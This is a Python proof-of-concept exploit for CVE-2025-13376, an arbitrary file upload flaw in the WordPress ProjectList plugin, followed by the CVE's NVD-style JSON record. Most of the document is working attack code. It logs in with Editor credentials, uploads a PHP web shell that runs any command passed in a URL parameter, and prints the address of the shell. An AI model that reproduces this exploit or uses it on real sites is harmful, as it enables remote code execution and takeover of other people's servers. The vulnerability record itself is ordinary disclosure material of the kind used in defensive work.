CVE-2025-13376

#!/usr/bin/env python3 # CVE-2025-13376 PoC - WordPress ProjectList Plugin Arbitrary File Upload # Requires Editor-level access import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "editor_user" PASSWORD = "editor_password" PLUGIN_PATH = "/wp-content/plugins/projectlist/pages/pl-add.php" def get_nonce(login_url): """Extract WordPress nonce from login page""" response = requests.get(login_url, timeout=30) for line in response.text.split('\n'): if 'wpnonce' in line.lower() or '_wpnonce' in line.lower(): import re nonce_match = re.search(r'value="([a-f0-9]+)"', line) if nonce_match: return nonce_match.group(1) return None def login_wordpress(): """Authenticate to WordPress""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" # Get login nonce nonce = get_nonce(login_url) login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f'{TARGET_URL}/wp-admin/', 'testcookie': '1' } if nonce: login_data['_wpnonce'] = nonce response = session.post(login_url, data=login_data, cookies=session.cookies, timeout=30) if 'wordpress_logged_in' in str(session.cookies) or 'wp-settings' in response.text: return session return None def upload_shell(session): """Upload malicious PHP shell""" upload_url = f"{TARGET_URL}{PLUGIN_PATH}" # PHP webshell content webshell = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" files = { 'project_file': ('shell.php', webshell, 'application/x-php') } data = { 'action': 'add_project', 'submit': 'Upload' } try: response = session.post(upload_url, files=files, data=data, timeout=30) if response.status_code == 200: # Check for uploaded file path in response print("[+] File upload request sent successfully") print("[+] Check if shell is accessible at: " f"{TARGET_URL}/wp-content/uploads/projects/shell.php?cmd=whoami") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-13376 - WordPress ProjectList Plugin File Upload") print("[*] Target:", TARGET_URL) session = login_wordpress() if session: print("[+] Login successful") upload_shell(session) else: print("[-] Login failed")

{"cve": {"id": "CVE-2025-13376", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:49.877", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ProjectList plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 0.3.0. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/projectlist/tags/0.3.0/pages/pl-add.php#L27", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/projectlist/trunk/pages/pl-add.php#L27", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/781c3b84-df80-470e-8bcb-3305a8bbb64a?source=cve", "source": "[email protected]"}]}}